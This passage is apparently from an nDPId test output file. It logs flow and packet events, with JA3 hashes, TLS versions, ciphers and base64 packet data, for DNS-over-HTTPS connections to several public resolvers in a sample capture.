HkTyoqhk2wuau1Ks3W6ziSuG5ItHrlZeoz2vdhzoVB+PdecdxLzV339b9A3nHa+rng\/3RfrU7m\/xV1uGOltE\/q6T8zbMwllfgMWQHWJtalokkS691O3vXWaxSb0GH3Eukn2GTLqT7xyn8hsg3I5F5pOCMspm6GHKCedNXQt\/rOrbG+70oNkLEiqOTucHrzdm7u3q9vZm5H7InHwwhmYB9o+wmMx9CpSsan17Eu6kQzONsC+k776iKm10F9TFCFRzcFvoSkJVRCogWUna5X6unZPh90yhZj+joK9OmDYl3uGf3cxeeYhuWr7BFipgMV88P5BfhbMuQJTiRkmE2tdVLKXiJJMT3RIuLttxViwKIZxqrsBPVZWuFgeoB\/tNKx1MPoFMSkd6Ady\/JPiKCd\/Lo+LSa+EGciXu3JhsD37LOO\/iaE1hxwYGWesFtcRBD82I4gt\/VZ4IZMSaNKHgm65E6lCcq41BJ\/gbuCDCFJ47l5UE8QhYSOHmp5J9j5vA1FjZFm5Iv6VRZaegnWKKRCmp+e5pBYWdf4T92iFA3wkmAojnbzcZPXM1FL7vahyaLx6fEfTzbYntPyfIJ2l5KJE855FQl1WRsib7X80Yvtknk5W4cHEv1yr1kjUU2CGJ8WMhJhi5rps9ncDKvd4PP0dTrH0ia8H78o1K4OYwHp0nPI0tpDBJqSO906qPhy7pON78NLR8NLi7ebyinTbjqYrIeAPW0BcPQXfo+ePTRQEGlW7G5LCAYlQCvO5j\/LMgF9c3iJwt3nUbOE+eqHvK0\/PHJmQK+ijLfXFLdBd6NBQSn3sHF\/qzgQRE5VwfSRmK55bFmg0PCiTnhGTWzfK0OvOvyyAAiwvXCaBV+gFnzKnwwQ+4ebBmLMgQpqYGGOrzwhV7P+RvbAFwMDARmYqpARsWX06T7\/aIqUa3gqpszdt6QdkNXpjrjP\/CtX9C+2AHbAmlDaq+eynMum8sDVzFoKFvQfGpt91s0+c4BcfaWSQDicP6abNOaMq+Hp75lMfIATEOyO9cUpGtsxdjbO98fR3ligfvynTicYTBBKOabjGzsvGqpIQNsc6yP7ec1DM5IvytEF3WMD\/BSWfSyCMBkPc77J1iCDteQqYtaAe0whPDVMG6GGDORujY8TM3L19IZL3YvYjw7AjSCmeKp+dThVSFL7D\/ks2Bt12v6Pc4J\/bL1kxAzO4vYx1vazs5rxcAfFBrI00UuE4UKrW1AuFrQrWAmy8gFVgJ7l+nCzCeDoyrV14OgMNuqUXIpirZiejq2fhnoXshcDAwA1MiDkD+m6EfUtBdx\/Pyl0ehgKaB76+ayZoBt6uEP7tnUDn+hUUsmcN7NZ1IZhFxhyx2uKd6w="}
00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"thread_ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946739304887,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739304887,"pkt":"REREREREZmZmZmZmCABFAABoCqRAAL0GK18KAAABM56TMtqaAbsV\/Em6hf1DuFAYAfWH5wAAFAMDAAEBFwMDADVGrMk33Jx9u4V9oT8gk9T3N9siooKVMszOs96zlvjMst5cKF\/6mDE\/X3tfb1uyKq+NLUpVEQ=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946739305016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739305016,"pkt":"REREREREZmZmZmZmCABFAAFIJYRAAL0Ggi8KAAABuf2aQugMAbv\/W2fgE34PaFAYAfYWNwAAFgMBARsBAAEXAwO7rF9fivBYq0PPnnVftpI5xv63Wth8iDXYIbCI66xBbCCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zZXMuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIHdlaU8VTQtoxOo631cPtMLo1fhD\/NP8\/WHh2FCfWmp6"}
00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946739305061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739305061,"pkt":"ZmZmZmZmRERERERECABFAAuA+UlAADkGKDK5\/ZpCCgAAAQG76AwTfg9o\/1tpAFAQAIMgbwAAFgMDAHoCAAB2AwNWoPreEkJ\/UPiZCRV0IEx6jRSqugqY3M+B37V87ydZxyCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jBMBAAAuADMAJAAdACB0RVn8jGqUM9fyfUTkTuhvHxWfPva1vJ9a18\/+TyUNbgArAAIDBBQDAwABARcDAwteuwCVRbAjw9pKtY4dNJzB+NkDPzUPU\/YSrAhwNpHIEK5V+o2\/HqZHUFxtVJbEBPgURU0pRFWa9dL9lQp8LuDwWHwDq1H1B4wIu6Cjn5BK872nUeQltRw5+FbrO5MDeZZJRgg48HKHnsK1mBHQnXLVwFvBE\/e\/UwSrANn9vg+B6zkss+nwjnEuw1XfKHcjr3B+gq7Tt\/pkx\/SEVt9DDhoVQjkT+nj8Ch6uFvKMxBfoNlGXQAfQ76Cfus9zBAZT5EY1YHp8kypEbWJsqWobkhk3j7efutg\/+7i\/\/3hwY3S4DA+PZFxsrSsM6AIVwaJ95fOH1dRdOyCRxbfVQ1s5uNDJcA7OdsaNR8VQ06UA5uK3FnFY9IaeCSIuzswKtKKP\/cTlEabfxoFlZbInteiv8UhvUx14oYH8877iKbTHauga0SrPYwJ3hDQ38FuPBJ16hIcickFsAxoIxHcrJTcDxD31\/+27P70ucqJUKNnKmwnMS5iCjU275dZeWQ9Zr0T4s7GAOpJ\/qhuQ0adCzilfe+zxessB1BHzKqNpomqUeAJU6wiiIZGwIQCSR9TnB+R6Furn+4OgUG6PGNdXCZNQ9itsUGoaOah9Fd+b\/mJSMoK\/FuhgIcCIxvGAml0OlSPbxxyIuGAWgYtRBimB3o6JaqY5BlDiRDxZX24w4nNBhNEgZ23H2qCY1hFOw\/NxAIqZ6i1OczcdQK5je4mFGQnk7n2Dd0xCvT\/QbVT+DGwohNzMpmrD81sKP2YRMryNcEXaCYgEk0oi4bjQNtHjwEi3WiSTxdHtROjzPbx1MuktYL6gASggOg1Ub+v8yVRI6bLdeV5Xwvz5ZxoF9vdrBEyvVBdMauaRYoyVnXm15LfrTPUCeXkHS1kWpj909RBaupD8tKI35AMNBM63GiCNIPCKacZOle5IpXYl1uAfPyEf7I7c\/Z2VAGWif0f1eRsudqghQ1VDSbMFMSOUlZF8oqR69Dp+GUrZSkzXH\/vlToVdum7PDCHkza\/W9cBDPI5wtxaPFdq19aD9CF4UXzcnY86h4hX1BAKMl5ymvY9oQmQKwLyZZk7gJ3BG3QSRRkEJLHmElRTA\/j6+UD2DUirljLXPFbrXC2eKn2CCwq3Zuv5P5wO5+t0UU\/yghFoQluNjQ3lfw4zQuwuXqm940OzzyqoEcUuHVR8IXnZ8TZqE90q8rCtGIOP+LD4hWpqBqHuwk66vMcJQgwNCFXix5ZnSXLN0BgV30sQI8N\/4QNcrVg18QrqrwMX5353ArFRERLIaGuZFxOud2tKJXNi7\/8bnQL4pfggVMDHzys0Vv2kSkmMM9AH5fy6is33XJQsCiLeVAW2BJv0HWG\/2v54ftufeuJKqjAweFaFpf8nOnSzUujidt2Hj6vD7NzSy9u5bVuAiVU8CLsOjLUQDZZwuXq5KPOpcqPkwUfO\/JhY2IYSty68WbtoEQ\/LicI5G0k7qhGVYDDLZjTT029eOEYuXI7f+lB6Kb+6SLaMGDm8r9Mw7ebinM16XyWOwJ5JBUayf+vtez432JNrnbq1SGS5rLH5Fg5ZMgKUFbGPULmfIDV2jwsa5no0weJKoBPHSF0j2z2Ws3ZeYohMSNwPof+eIkWPeDsS0odMH3bOI8vjnmbAlt1LEuTlP9Bgfbe4EZBkTArblnr1PduSYp9HHqPcDcdegoFu3tk12XJWCeAczLwMdcKTivhfzRMPv6R\/QbwvNULNcqw3kjep\/lhPa8MK5fd2CGyIw+LCWxGXv+q\/ds\/TSYSN0doo9wcXYWwj8LntYcpK6i8bE1mnU9HhfDXOdgKZheyUxq\/2aHTotcU7hlwJGxzG1S8L2XOL+e5cK\/uWYrHMSCsilBLjzbaE58\/UhgQTo4G7REl65txB7jkxytOXC2V8igiA\/VVPL1iSyOqszjZhZj\/KQ7cRXbuiY2hUvh3d1GHeunUPxkjVr7SBFLwo5npluN5uAfc+7Lx2v8sh\/0AXjRBQzrzXUGOKzmSDk4EsluiAOjG78HzOAmharQORiNXCoRaRa+fhf0Ejafe7HoDuKqj5ukCKAbsCU6se\/uViDv0Ko0frloNjTZWVHeFLAU\/8Rxbf5R8lMV480rpPEWmLytLklZol4xviBgu3uvWIUzW30atpHjpq+x1y1B4ZeqEOMO83R7O6ddmc3f06vtoo06tW\/Agu9h766pQvpNm2vTYudTnd6DSqBlKI5KeonXz4AxZiEG5DKNiVkur+pxwlM3ugAjT44z5C6NIq2xLtYBKvjI4ZiVK+oThODcy5mgGaurXo21aX3cTizFa3bH6OPqttL9gjP05Bka27HY2jgRwKVSbziiMro9AX8Xsmg6S2yWOPjJLfqZCcbtLmpaNGvdFtOkH77j4F52qkt+me41p1UftUvN6wiwxxp99NI0\/fMosQgl7ighWoY2W\/IB0fXHatEvBsmPr1KEj7P+aJaj7oNVmyRVuFHPwaBwwi7T8Vvj9wG3gSDuuYdP5+UFDM+35GxMSRkihqY1Nf52lvDc2vDx7TdolcUJnmrezHB7iOplwsA\/pnoSxDqDzY8u2hWCRC+c4jg1z3vL2zvzGplrkFak387ZT7iXl569hRQY0g6W72J\/qU\/wWvKrh5aic7Fca9+09fN8mKvizdcBFS1tmo5ud9hSP5IApLh\/AqNGAsSvFB77AMVMPcqCZqs\/LzhQ6p8mk1Ztud+POMwqvs7eCTrsyIwvCFHr3MjxRECobkoOUnKuDn6O2Ba4MeFaOtHE1XjJdkhICNgy76FwlNk7qa2miONerIZrFWrQmU2yx1Al5ihAv+BSYo7OLYt9zXUcCSntdFwaG5iWvn2D3TqvQcyGsX7n8R8YOUmBL+xEDz8\/cHI76eHoMT9Gcmgev3Cz2de\/7ilgKsoMsC9dl+Ldtg+QDnuzeji5lROtOH+fv+MRICCWa3t+oaVa2XgjAhIywmeaAGP7+W10HhLqbtIimjrrdbxpeltnnJv0HxLov9cXj+b0Pm2tBSSGlhGmiCqLRib5vepRDq5ASTdoFYCIMH422KVZztJ1b63ltyCjG5NtOVaK\/MkO7\/KWS1XPbQXAVUScApoXkKlzQiVxTCMZQoZIoE4pH0+fjzQcElC405f+pmLRfF1iVpdbRwPdWdjvokVy8bVGY3GGXVtgS7DasELvMxZruoBcMEH12JcU31nt00epqRaM7Ty\/hGPJ9RgbFIN6nscoLHLm6YFkdOMqn+3D0CMvB4x652Bu8PF5m7DHJMIBJSoh\/WEUOZDxlHi5CT9KYRNTMZDhIkJj++9o8TtwBf\/+FOKgQZYlLc9emRrICiIhqz7dIu9M1nNq8igrwodBBqfV3IJasHHoy\/F57WNpO6ufh54oPFaVKYJn1bg656yNokeiXMSkMhJsmjb0+SAmQ0rTBRRWtbjoeZCc3gkigutNXY3WNHxKSc5xsJ9iyr3gTZdRpWgWbT+isP5Ovqam4GzSglt\/k+unyjMz4\/f8vVi\/7W288anM52u2gAT5Id3RGTrtEQDPQ8UVftSrylfoNAZTKGGhUJLAcmefkYZfUt\/EB+t1\/S5DOAvsgdK0URdbVybob0RmFJKIBsQ7DYRwD\/HgqXJ6uMDVUKO9XoO+9dwhRf11sqhooAzPCeXtVLggV615qXldaBtBjJ4Fa\/LAamnbZck+pr1D1RAPJP4HQwfBLL\/eWmzwOCA4y+tqnSn"}
00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946739305063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739305063,"pkt":"ZmZmZmZmRERERERECABFAAC4+UtAADkGMvi5\/ZpCCgAAAQG76AwTfhrA\/1tpAFAYAIPkeAAA4ov2OS2FYwHLyLK8HvldhjW58oZhz\/dEDG0qRvP07Xrr9KbrwFzXsPAENpwnRYTilEXtuGTXfjP8+51dqVC3h3Voz6vzPB2E1qN7598iQNHjvdaBjrZ71M3dNmhXs0fudaDBYxVH3HnrCgr\/VoLnr9AAImTV5ybiMJS9e3W0V7h9Z35p6EhyTXdDS8\/1x5Ew"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946739305650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739305650,"pkt":"REREREREZmZmZmZmCABFAAFBLvBAAL0Gw1EKAAABrGhdUJ\/qAbvjN2w6lQOuzlAYAfbLqAAAFgMBARQBAAEQAwPaSOnODEW\/53X3FLI0n+Mih\/iyk2Bze7sXLhS9N0ueoyDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALanAudGlhci5hcHAABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgYin8bJdqHx3ibHrbfDgwuFVcZV3PPNkWvp1zHo7\/2AM="}
00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946739305852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAXUYr5AADcGEPGsaF1QCgAAAQG7n+qVA67O4zdtU1AQABbJOgAAFgMDAHoCAAB2AwMioc+jlzNc+VBJaZcDKojs21jGEKcSNKyg9ExllQqy+iDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hhMDAAAuACsAAgMEADMAJAAdACAdEExo5yrIKmMZ4nrOia6UHa7Zh09ZMNUZYLDF+NYxaxQDAwABARcDAwAkT\/VVW9e6tSXUn2DgdOFI1vJ9CWMqaG0B1UgAogfcRWwpZ74dFwMDDDNZ3TFhx2HRd\/d\/BnLRqx3w9gJyapE59ga0mk6Gbdpy2uhfU1raH\/kLDwO0PHahqFeiov5PtmafDzH5oAzRDBThfFaKNK986AJtqna7+\/+W9HqZppsUeMeFtSdutMbm9VkvNNWFsngalQ8\/TjlWYt\/LNabidW0R+diEYRXkVHectSDnGgpIKw7AqJmgGmRJSQFZmk8mMFHUip8Ns8L0Qm+4mFM3OyM2y8uotBFp52jwBE4JcdWTlWvX638UUEwGd0+Jev1b4UZvqaI8gBJQiwDYthQvx2cilE03gvQZUs1gLv40OT\/eDg1VwASYtXu1QKuaTXj67d3FvJUxTfjdc9Un1x\/xpNxQ9IvL0JgGMqp5Nvz4C+qRYd\/CysKeUwM5LkGikxDP3qZXZjcRDF3CvWl\/0RJAgB68oCh4lzQ6BTBYQsLIO+2npSdMMO1mcmGxOeyAtRoiglI\/Mu+7bxclTAdkFUgpS6V0wzwluZmFW7Rx4iiSeZWVmQDKjFeHStRAafyFrtH26wCU1ei1O7zDiCd\/St5EWtAfoATjugif\/dASmeS6peR\/N837DyefuOM7XNJbAUXXdVYFQbj88dVPYC1ZWfSpl1wPAKf87TREgv6h4ZkxzRnB6COvKSvUqklCC1SSMJfennS1L0Etglf8wZsulJYWIe6+sEiyvEkrN24bb021w2X\/KuVEn+j5dyEDiGG5loD+4VYwc9G5Wa+jxRUO0+A62CO2opPif7xWIxQXRSJ441bKp\/i7j7P+cl88sdZsTxv2ygPWKGEBO4XHbg95EUra3m5LdhfhQUM\/e\/n+Ak+LAL3mStir5xjEDf9+haA4s5VbKmTRNrJtFiUwt198TeBjvlKCejLbJO6d8gE6SQECz4iM7IcNa\/bXR7adNUuu8qhullq5WfyiHcztVpItdHmrHXbaCsGaPgIKVpIJp30oUBjXbdyBrklTyARetsx+L4hfDlDZiZOEujpickcQVHRV+Rq6dF5UrRJYU3XU\/ZcqBeRvNXpu9d46M\/bhnVClgq2Bd+aOiR2kaho07AGNJ9Fr4k5Jos+2Q6DGpQasXC6x+iPauGKBp59nwGXbOOKtd8ArTxOlVzQmOZH6I0tx+iKMplPSCHR8FFec2EwXBLm\/1vyI9Pwo+zYiVdHp09rRHeJXaKGgiynxtv128gHPWfts6k\/bUS8N1Dw2y1OWa2cDxVOv79IA65ALHyABrPQbEH+byQd5tzeWrWUmzmNi3p4jdd62IgsA8HkYmsZmy5jIyKyWEYlUo1SPeqjIhX9VriaKoSoSKPFRDULdhc+03ZBXd6SKMHCSS7x6DpL0ufFkfc0ZfcGyz8s\/jngcscp5gmPQrY+VfOmrZe4EnOIAqkwdbS5Vejc5Yga2D4LRGGWgMYBm5SScqu5500ZCpE0WmkryZPm\/4OMJ47iDZWRTkVie5Ea9ONRDlM9tVglWZF\/oUiAJVVWh4mt0z6nVYUgTMbtTn0pDKN\/0TJikQ5gt3TXgtioj57ko+eiK8raQcuhqyXG3KA52lsLM2MmWuS6VxCjD2hxANDc3R7BZOaM4bmyza4JUsEms3Y5aNGYiFwaMTvyvPSX55q5QHTJ\/Mi827fNg4TtCrFRxN6XxJuU0RfIATOX3faQkD1YP1V51gStaTXEj1EBrNyqEnKqYk6Yxs2aBmn4CqaTQ7ru+2yyoapdX3D0JCzKb"}
00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"thread_ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946739305852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2248,"pkt_l4_len":2214,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAi6Yr9AADcGDgqsaF1QCgAAAQG7n+qVA7R64zdtU1AYABbTIQAA7khOXiRDmimON10SUW6EdkRNtideeCAmsCP9ufTAbxPBEESbRp6rJdX9WpgeGKEcs1FSJYqSgEbwbmVZ45a190xHBVgYJoheRrXwVU8\/AsBaHDXul428WYkRrLMS2d7ip3ZonDd7PZHF6J0j5\/wI70KV9AUCOBt\/Btv4kzO+Hj+j3yK5bLSbWlRhD1fuMQAb+cF537u0\/U3MsC4OMo+87usOrwz6eMrKL+s31DCb4z6f8eENi68oRi9OZYKpoRYjhFkw0unmspSreLKjulrpWluVXrk1btWPgYpUVnavuXquTK1NtVner355EoOvAf5CAN1Y8OcMXqML8XqYMeqEg34ZtCcYr+tnetE29K921LwsoIOkJdbaiCVLTv\/9X++VjLPLL4afBqrrwx2ZkXw2VSOvNSpMcVsFQ2sks0er7rCvo3vy970zXk8N2ZRM9DEPyk4S8i+C3Yw3j6efIbDNyRRGIb1TGn6z1LzsFfHkHQ\/coPiZhIhvnK6o5iGWcHYOGEPLh4XlmZt5EnCBavREWdcXDAq+Rj+biwLLNbp9Xm75T3bbWxLQivCzGfNO2oBB8jJz2Zicez5S7098raXjnFVLWws7S\/ZjTQ11gAbLNqyHJOm\/RerOFZpkbGJsCCKjsmgBFYujoZTifdvrnskuFGuKqjRU7sBnWY38jO4yTlznAvt2Cf2\/I4bnh5roD5\/h3R\/5c28EQTDGmOL2\/KspdGSS1bjToJBQbcS2YbFnjwR5yrS+5SOLXVmRcZDGU4Ke3DaCJifWpD1EVuVb2ilryPAD8yGt9JaIe3cT9jnaxoJojKtbQNqrLa4+HAzDJSTrT+I7IXNvzHDQ5HJdRQkyKEzhMuedfOGX3aae0qJMXEdgmL8U1YL9LUgqs4gaInFpYecyGYMFaC7RpVTbVJ8AclN3JFij4ikMLs8OvolwBsIUxkwvTd2kxXvS\/GtkZpTdB40Qwypq6\/slHam9c8zmzEZ9VsQqYPOs7EU3IWXPB\/7jwR\/Swoqx9IepHlyCi3ipHUa3krt79WKeMN9slFrvDSuGQo7cCX4PwLWqGq1s8n4xGAwbb4PADqo8FJSgQHdjNMolIHMWyuqk5nqOgc0W36SeHQOxctDFxw00aD7\/ZIjnA7m+97J5Qh0XWgw5Lpsc8Mvp+VBxyMQklBuDFOyN3HJKbg943DoSjIMucZn1tzh8KOxw0Xql8+gP0Tj\/ncw8jVi\/PzuMVXmWMiQX\/wdJfEzJkJUlcXDAAE2IesO7KR0oZhnwcsaVEwrsJruOKxYtv2pbkmhOIxpFm4wJGmE+2JRFXkQDnRtvWvAJoF\/v0k69TDViO86TF2AjLFejfwjQQnCJXVkS4fuCh3i1TYrS+lUkfVezPrjjWW3F2LEdQQXJZmRfoBHSJjBhCP+Dcoc3jONSa9PXKqNJSf7Vo6MbkHB0XBcD7sdIZ2\/wIgxkllAd1uSaGBwJI8\/jhtA8RENMPWOxsz00xpbl8rHi+OkSD\/7Q58nbh7qhfzlemdSmsTNYU4yTeEr2yQTmNZcolwert2uPuF9VK2g\/3nveH2piPFCpAJOd4Z5dmxFR4fRYAGlILa5aNYiyWSR3G947wAwiYaU7l0JrzUlByQFpex9hGDkjjcctCUn8127O6yoOswVES887ts\/gfsXkn4d0JROgJbDiWFnN7j7+sZKWDkghhJYjTBSDkBNASiM9XLxgQ\/DaEwEwxYA7HjPEO\/8BxDusP8aK8hEqBPa8c8eFHdAYT3Eu2hChRagjV1O7Z0Zuc1z25GaMGiFKl7kwOrHIqt7609HLDEc8DgoFPHHr7IZJAecPMzvqj2CVzFTWl+NcGQgu1OZDB7YN8IsYE0Hj2wxjJJ4M8ncKFSWkLxvPRwAg+0